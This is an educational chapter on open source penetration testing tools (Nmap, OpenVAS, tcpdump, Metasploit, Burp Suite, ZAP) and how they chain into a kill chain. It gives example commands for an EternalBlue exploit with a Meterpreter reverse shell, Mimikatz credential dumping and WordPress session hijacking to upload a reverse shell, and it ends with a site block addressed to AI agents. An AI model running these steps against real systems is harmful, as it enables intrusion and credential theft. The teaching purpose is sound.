# Penetration testing technologies

## Learning objectives

* Become familiar with core features and primary use cases of major open source penetration testing technologies
* Differentiate between the functionalities of key tools, such as network mapping (Nmap) and vulnerability scanning (OpenVAS)
* Understand how these technologies integrate to form a comprehensive penetration testing kill chain

This section provides an overview of the major open source technologies that form the backbone of modern penetration testing. We explore the core features and practical applications of essential tools, including Nmap for network discovery, OpenVAS for vulnerability scanning, tcpdump for traffic analysis, Metasploit for exploitation, and Burp Suite and OWASP ZAP for web application security. Understanding the distinct role of each tool as well as how tools complement each other is fundamental to executing a systematic and effective security assessment.

## Topics covered in this section

* **Introduction**
* **Nmap: Network reconnaissance, scanning, and enumeration**
* **OpenVAS: Vulnerability assessment**
* **tcpdump: Traffic analysis and forensics**
* **Metasploit: Exploitation and post-exploitation**
* **Burp Suite Community Edition: Web application proxy and manual testing platform**
* **OWASP ZAP: Open source web application security scanner**

### Introduction

Penetration testing relies on a suite of specialized tools to systematically identify vulnerabilities, exploit weaknesses, and validate an organization's security posture. This process, often conceptualized as a "kill chain", involves progressive phases: reconnaissance, scanning and enumeration, gaining access, maintaining access, and covering tracks. Among the vast array of available utilities, Nmap, OpenVAS, tcpdump, Metasploit, Burp Suite, and OWASP ZAP serve as core technologies, each addressing distinct phases or needs of the penetration test lifecycle. Mastering this toolkit is not just about learning individual commands, but understanding how to strategically chain these tools together to simulate sophisticated attacks and provide actionable insights for hardening defenses.

### Nmap: Network reconnaissance, scanning, and enumeration

Nmap (Network Mapper) is the de facto standard for host discovery, port scanning, and service enumeration. Using a variety of scan techniques—including SYN scans (`-sS`), OS fingerprinting (`-O`), and version detection (`-sV`)—Nmap provides a detailed map of network assets and the services running on them. During the initial reconnaissance phase, a penetration tester might execute a command such as `nmap -A -T4 192.168.1.0/24` to perform an aggressive scan of a target subnet. This single command combines OS and version detection with script scanning and traceroute, quickly revealing open ports (e.g., SSH on port 22, HTTP on port 80), service banners, and potential attack vectors. The `-A` flag enables aggressive scanning options, bundling OS detection (`-O`), version detection (`-sV`), script scanning (`-sC`), and traceroute (`--traceroute`) into a single convenient switch. The `-T4` timing template accelerates the scan under the assumption of a stable, high-speed network, though testers should exercise caution as it may trigger intrusion detection systems or overwhelm fragile targets.

Beyond its core scanning engine, the Nmap Scripting Engine (NSE) extends Nmap's utility into deeper enumeration, vulnerability detection, and even limited exploitation. Once open ports are identified, NSE scripts can perform detailed service interrogation: `banner` retrieves full service banners, `http-headers` extracts HTTP response headers, `smb-enum-shares` lists accessible Windows file shares, and `ftp-anon` checks for anonymous FTP access. Moving further down the kill chain, NSE offers vulnerability detection scripts such as `http-vuln-cve2021-44228` for Log4j, `smb-vuln-ms17-010` for EternalBlue, and `ssl-heartbleed` for the Heartbleed flaw.

At the outer edge of its capabilities, NSE includes scripts that attempt credential brute-force attacks (e.g., `ftp-brute`, `ssh-brute`, `smb-brute`) or leverage specific misconfigurations to extract sensitive files (e.g., `http-shellshock`, `http-phpmyadmin-dir-traversal`). This progression—from enumeration through vulnerability identification to limited exploitation—demonstrates why Nmap remains indispensable well beyond the initial scan. Its output forms the foundational intelligence that informs deeper vulnerability scanning with OpenVAS and subsequent exploitation with Metasploit.

### OpenVAS: Vulnerability assessment

OpenVAS specializes in deep vulnerability scanning. OpenVAS is the scanner component of the Greenbone Vulnerability Management (GVM) framework, but the name OpenVAS remains commonly used to refer to the entire vulnerability scanning suite. OpenVAS leverages a continuously updated database of CVEs and misconfigurations to detect weaknesses like unpatched software, services that are known to use default credentials, or SSL/TLS flaws. For instance, an OpenVAS scan might reveal a Windows host missing MS17-010 patches (EternalBlue), prompting further exploitation with Metasploit. Similarly, an OpenVAS scan of a Linux web server might detect a Tomcat instance still configured with default credentials (e.g., admin:admin) or identify an outdated OpenSSL version vulnerable to Heartbleed (CVE-2014-0160), both of which provide clear paths to compromise.

A key strength of OpenVAS is its structured approach to vulnerability management. Scan results are prioritized by severity (Critical, High, Medium, Low), providing a clear roadmap for remediation efforts. OpenVAS provides detailed information for each finding, including the associated CVE, a description of the vulnerability, its potential impact, and often a solution for patching or mitigation. This transforms raw scan data into an actionable report, enabling security teams to focus on the most critical risks first. This comprehensive and auditable process is essential for meeting regulatory requirements and maintaining a strong security posture over time.

#### Nmap vs OpenVAS: Functionality/capability comparison

Both Nmap and OpenVAS perform authenticated and unauthenticated scans. But Nmap performs authenticated scans in a more limited, script-driven capacity. Nmap's authenticated scanning is an extension of its scripting engine, not its core purpose. Many advanced scripts of the Nmap Scripting Engine (NSE) can perform authenticated checks, used for targeted information gathering. For example, scripts can use provided credentials to log into a service (e.g., SSH, SMB, or HTTP) to gather more detailed information such as system users, shared folders, or application configurations.

OpenVAS can perform authenticated scans (the vulnerability scanner logs into the target system using user credentials) for deeper access, making it critical for compliance audits (e.g., PCI-DSS). However, the majority of OpenVAS's checks are performed remotely without credentials. This includes testing for unpatched services (e.g., an outdated Apache version), checking for default credentials on network services, and identifying SSL/TLS flaws. OpenVAS can also be configured with credentials to perform deeper, targeted checks. This is a separate, powerful feature that allows it to find vulnerabilities like missing software patches (e.g., the MS17-010 EternalBlue patch) by checking the system's internal version data, rather than relying on external probes alone.

Both Nmap and OpenVAS use scripts, but OpenVAS's scripts are more comprehensive than Nmap's. OpenVAS uses a system of Network Vulnerability Tests (NVTs). Think of NVTs as specialized scripts each designed to check for a specific vulnerability (CVE), misconfiguration, or compliance policy. OpenVAS's entire scanning engine is built upon executing these tens of thousands of NVTs from its continuously updated database.

**Nmap's Two-Layer Capabilities**

To understand Nmap's capabilities, it's helpful to think of it as consisting of two layers:

1. **The Core Engine**: This is Nmap's fundamental functionality for unauthenticated scanning:

* Host Discovery (`-sn`)
* Port Scanning (`-sS`, `-sT`, etc.)
* Service & Version Detection (`-sV`)
* OS Fingerprinting (`-O`)

2. **The Nmap Scripting Engine (NSE)**: This is an add-on system that extends the core engine. It allows users to run scripts for more advanced, specific tasks. The NSE is where Nmap's authenticated scanning happens.

The Nmap NSE provides a framework where scripts can be passed credentials (usernames/passwords/keys) via command-line arguments. These scripts then use those credentials to log into services and perform deeper checks.

**Examples of NSE scripts doing authenticated scanning:**

* **`smb-enum-sessions`**: Uses provided SMB credentials to list logged-in users and session details.
* **`http-auth-finder`**: Can use provided credentials to access protected web pages and look for authentication forms.
* **`ssh-auth-methods`**: Can use an SSH key to log in and check which authentication methods are supported.

**Nmap and OpenVAS Functionality/Capability Summary Table**

While Nmap excels at discovering live hosts and mapping network services, OpenVAS specializes in deep vulnerability assessment.

| Feature               | Nmap                                                                                               | OpenVAS                                                                                                        |
| --------------------- | -------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------- |
| **Primary Purpose**   | Network discovery, port scanning, service fingerprinting.                                          | In-depth vulnerability detection and management.                                                               |
| **Scan Types**        | Primarily unauthenticated. Supports limited authenticated checks via its scripting engine.         | Comprehensive unauthenticated and authenticated scanning.                                                      |
| **Scripting**         | Uses the Nmap Scripting Engine (NSE) for targeted tasks like banner grabbing or basic auth checks. | Uses Network Vulnerability Tests (NVTs)—a massive database of scripts for specific CVEs and misconfigurations. |
| **Example Finding**   | "Port 443/https is open on host 192.168.1.10."                                                     | "Host 192.168.1.10 is vulnerable to CVE-2017-0144 (EternalBlue) due to a missing MS17-010 patch."              |
| **Typical Use Cases** | Finding live hosts, network inventory, security auditing.                                          | Vulnerability management, compliance auditing (e.g., PCI-DSS), and penetration testing.                        |

In a typical workflow, a security professional might use Nmap first to find active hosts and open ports, and then use OpenVAS to perform a deep vulnerability scan against those discovered targets.

### tcpdump: Traffic analysis and forensics

tcpdump provides packet-level visibility into network traffic, essential for debugging attacks or monitoring suspicious activity. During a penetration test, a tester might use `tcpdump -i eth0 port 80 -w http.pcap` to capture HTTP traffic for analysis (e.g., finding cleartext passwords). tcpdump is also invaluable for MITM (Man-in-the-Middle) attacks—filtering ARP spoofing traffic (`tcpdump arp`) or extracting DNS queries (`port 53`). Unlike GUI tools like Wireshark, tcpdump is lightweight and scriptable, ideal for remote servers or stealthy operations.

The true power of tcpdump lies in its sophisticated filtering capabilities, which allow a tester to isolate specific traffic patterns from a high-volume data stream. Filters can be built using Boolean logic and primitives for hosts, networks, protocols, and port numbers. For example, the command `tcpdump -i any 'host 192.168.1.5 and tcp port 443'` would capture only encrypted web traffic to or from the specific target, reducing noise. To detect potential network scanning, a filter like `tcpdump 'tcp[13] & 2!=0'` (`tcpdump 'tcp[tcpflags] == tcp-syn'`) captures only TCP SYN packets, which often indicate a port scan in progress. Mastering these filters is critical for efficient evidence collection and real-time threat detection during an engagement.

Furthermore, tcpdump is indispensable for forensic analysis and validating exploit delivery. After an attack vector is exploited, a penetration tester can use tcpdump to capture the exact network packets exchanged, providing proof of a vulnerability. For instance, while launching a reverse shell payload from Metasploit, running tcpdump on the target network can capture the outgoing connection attempt back to the attacker's machine. This packet capture (pcap) file can be analyzed to see the raw shellcode transmission or to extract files transferred over the network, such as exfiltrated data or uploaded tools. This ability to record and review the precise sequence of network events makes it an essential tool for both attack simulation and incident response.

### Metasploit: Exploitation and post-exploitation

Metasploit Framework (Open Source Edition) is a tool for developing and executing exploit code against a remote target machine. It is a sub-project of The Metasploit Project, which is owned by Rapid7. The Metasploit Framework automates exploitation and post-exploitation workflows. Its modular design includes exploits (e.g., `multi/handler` for reverse shells), payloads (e.g., Meterpreter), and auxiliary modules (e.g., SMB brute-forcing). For example, after identifying an unpatched SMB service via Nmap, a pentester could deploy `exploit/windows/smb/ms17_010_eternalblue` to gain a shell. Metasploit’s post-modules (e.g., `hashdump`, `mimikatz`) enable lateral movement, privilege escalation, and data exfiltration, simulating advanced persistent threats (APTs).

A typical exploitation workflow within Metasploit follows a structured sequence. A tester begins by selecting an exploit (`use exploit/windows/smb/ms17_010_eternalblue`), then configures the required options such as the target host (`set RHOSTS 192.168.1.10`) and port (`set RPORT 445`). Next, a payload is chosen and configured (`set PAYLOAD windows/x64/meterpreter/reverse_tcp` and `set LHOST 192.168.1.5`). Upon executing the `exploit` command, if successful, the framework delivers the payload and establishes a session, providing the tester with remote access to the target machine. This streamlined process turns a known vulnerability into a concrete access point with minimal manual effort.

Beyond initial access, Metasploit's true power is its extensive post-exploitation capabilities, largely delivered through the Meterpreter payload. Meterpreter provides a robust, in-memory command-and-control agent that avoids writing to the disk, reducing the chance of detection. From a Meterpreter session, a tester can perform a wide array of actions, such as keylogging, taking screenshots, pivoting to other networks, and maintaining persistence. Furthermore, the `load` command within Meterpreter can extend its functionality on-the-fly, for instance by loading the `kiwi` module to interface with the Mimikatz tool for credential dumping directly from memory. This makes Metasploit an all-in-one platform for not just breaking in, but for thoroughly exploring what an attacker can accomplish once inside a network.

### Burp Suite Community Edition: Web application proxy and manual testing platform

Burp Suite dominates the field of web application penetration testing by providing an integrated platform of specialized tools. It is available in two versions: Burp Suite Professional (paid) and Burp Suite Community Edition. Burp Suite's core components include:

* The **Proxy**, which allows testers to intercept, inspect, and modify all HTTP/S traffic between the browser and the target application, crucial for bypassing client-side validation.
* The **Repeater** tool enables manual manipulation and resending of individual requests to test for vulnerabilities like insecure direct object references or logic flaws.
* The **Intruder** automates attacks such as brute-forcing login forms, fuzzing parameters for injection points, and enumerating values.

The key differences between Burp Suite Professional and Burp Suite Community Edition pertain to the following features:

* **Automated Scanning:** The core differentiator. Pro has an automated active vulnerability scanner for detecting SQLi, XSS, and CSRF; Community does not.
* **Manual Testing Tools:** **Pro offers unlimited use** of Intruder (fuzzing) and Repeater; Community's versions are rate-limited and lack advanced features.
* **Out-of-Band Testing:** **Pro includes Burp Collaborator** for detecting blind SSRF or out-of-band (OOB) vulnerabilities; Community has no equivalent.
* **Workflow & Reporting:** **Pro has advanced workflow features** (task scheduler, saved configurations) and detailed reporting; Community's workflow is entirely manual.
* **Use Case:** **Pro is for professional, efficient testing;** Community is for learning, simple tasks, or manual-only testing.

### OWASP ZAP: Open source web application security scanner

OWASP ZAP (Zed Attack Proxy) is a leading open source web application security scanner, maintained under the Open Web Application Security Project (OWASP) umbrella. It is designed to be a comprehensive and accessible tool for finding vulnerabilities in web applications during both development and testing phases. Key features include an intercepting proxy for manual testing, automated scanners for passive and active vulnerability detection, and a suite of tools for fuzzing and spidering. For example, its AJAX Spider can effectively crawl modern, dynamic applications, while the active scanner can automatically test for flaws like SQL Injection and Cross-Site Scripting (XSS). ZAP's "heads-up display" (HUD) introduces a novel, integrated approach by providing security information and testing capabilities directly within the browser. Its open source nature and strong community support make it a popular alternative to commercial scanners, especially for automated security testing in CI/CD pipelines.

**Comparison of Web Application Testing Tools**

| Feature/capability                                   | Burp Suite Professional                                                                      | Burp Suite Community                    | OWASP ZAP                                                                                    |
| ---------------------------------------------------- | -------------------------------------------------------------------------------------------- | --------------------------------------- | -------------------------------------------------------------------------------------------- |
| **Licensing and cost**                               | Commercial (paid)                                                                            | Free (feature-limited)                  | Fully open source and free                                                                   |
| **Primary use case**                                 | Professional, efficient manual and automated testing                                         | Learning and manual-only testing        | Manual testing, automated scanning, and CI/CD                                                |
| **Automated scanning**                               | Yes (advanced and configurable)                                                              | No                                      | Built-in automated (active and passive) scanner is fully featured                            |
| **Manual testing tools (Proxy, Repeater, Intruder)** | Full-featured and unlimited                                                                  | Basic and rate-limited (e.g., Intruder) | Full-featured and unlimited (comparable functionality)                                       |
| **Vulnerability detection (e.g., SQLi, XSS)**        | Yes (automated via scanner)                                                                  | Manual discovery only                   | Yes (automated via scanner)                                                                  |
| **Out-of-band testing**                              | Yes (Burp Collaborator)                                                                      | No                                      | Via community scripts or external tools                                                      |
| **Extensibility**                                    | Extensive BApp Store for community-developed extensions                                      | BApp Store                              | Strong support for scripts and add-ons via a vibrant community marketplace                   |
| **CI/CD integration**                                | Yes (powerful APIs and scheduling)                                                           | Limited                                 | Yes (strong native support for automation and CI/CD pipelines due to its open source nature) |
| **Unique features**                                  | Collaborator for detecting out-of-band vulnerabilities; Sequencer for session token analysis | Entry-point to Burp's core manual tools | Integrated HUD for in-browser testing; traditional and AJAX spidering combined               |

The following diagram maps the core penetration testing tools covered in this article onto a unified toolkit. It shows each tool’s primary role and the typical flow of data — from initial reconnaissance through to exploitation — that turns a collection of individual utilities into a cohesive testing platform.

{% @mermaid/diagram content="flowchart TD
CENTER((Penetration<br/>Testing Toolkit))

```
NMAP[Nmap<br/>Network Recon &<br/>Enumeration]
OPENVAS[OpenVAS<br/>Vulnerability<br/>Scanning]
TCPDUMP[tcpdump<br/>Traffic Capture<br/>& Forensics]
BURP[Burp Suite / ZAP<br/>Web App Testing<br/>& Session Hijacking]
MSF[Metasploit<br/>Exploitation &<br/>Post‑Exploitation]

CENTER --> NMAP
CENTER --> OPENVAS
CENTER --> TCPDUMP
CENTER --> BURP
CENTER --> MSF

NMAP -- "target list" --> OPENVAS
OPENVAS -- "vulnerable services" --> MSF
TCPDUMP -- "session data" --> BURP
BURP -- "hijacked session" --> MSF

style CENTER fill:#34495e,color:#fff,stroke:#2c3e50
style NMAP fill:#3498db,color:#fff
style OPENVAS fill:#2980b9,color:#fff
style TCPDUMP fill:#27ae60,color:#fff
style BURP fill:#f39c12,color:#fff
style MSF fill:#e74c3c,color:#fff" %}
```

The integration of these core tools in a penetration test forms a kill chain:

1. **Nmap** scouts the network.
2. **OpenVAS** pinpoints vulnerabilities.
3. **tcpdump** captures sensitive data in transit.
4. **Burp Suite/OWASP ZAP** manipulates and hijacks web sessions.
5. **Metasploit** delivers payloads and maintains access.

For instance, a tester might:

* Use **Nmap** to discover an exposed WordPress site (`port 80`).
* Run **OpenVAS** to detect CVE-2022-3590 (SQLi in a vulnerable plugin).
* Use **tcpdump** to passively capture the HTTP session cookie transmitted after a test login (`tcpdump -i eth0 -A port 80`).
* Import the captured cookie into **Burp Suite** to hijack the administrator's authenticated session.
* Deploy **Metasploit's** `wp_admin_shell_upload` module through the hijacked session to upload a reverse shell and establish persistent access.

Mastering these tools requires understanding their strengths and limitations. Nmap and OpenVAS excel at discovery, while Metasploit and Burp Suite/ZAP drive exploitation. tcpdump provides low-level insights for advanced attacks. Together, they enable comprehensive security assessments, from external network scans to web app hijacking, aligning with CEH and OSCP methodologies.

### Key takeaways

* A skilled pentester chains testing tools strategically, simulating real-world attacks to harden defenses.
* Each core tool has a distinct primary function: Nmap for network discovery and enumeration, OpenVAS for in-depth vulnerability assessment, tcpdump for traffic analysis, Metasploit for exploitation, and Burp Suite/ZAP for web application testing.
* Understanding the strengths and limitations of each tool is critical; for example, using Nmap for initial host discovery before launching a more intensive, targeted OpenVAS vulnerability scan.
* Command-line tools like tcpdump and Nmap offer scriptability and lightweight operation for remote or stealthy assessments, while GUI-based tools like Burp Suite provide deep interactivity for web testing.
* The Metasploit Framework encapsulates the entire exploitation lifecycle, from delivering a payload to extensive post-exploitation activities like lateral movement and persistence.

### References

Kennedy, D., O’Gorman, J., Kearns, D., & Aharoni, M. (2011). *Metasploit: The Penetration Tester's Guide*. No Starch Press.

Lyon, G. (2009). *Nmap network scanning: The official Nmap project guide to network discovery and security scanning*. [Insecure.com](https://insecure.com/) LLC.

OWASP Zed Attack Proxy Project. (n.d.). *OWASP ZAP documentation*. The OWASP Foundation. Retrieved April 27, 2026, from <https://www.zaproxy.org/docs/>

Stuttard, D., & Pinto, M. (2011). *The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws* (2nd ed.). Wiley.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dti-techs.gitbook.io/practical-foundations-in-cybersecurity/6.-practical-foundations-in-ethical-hacking/penetration-testing-technologies.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.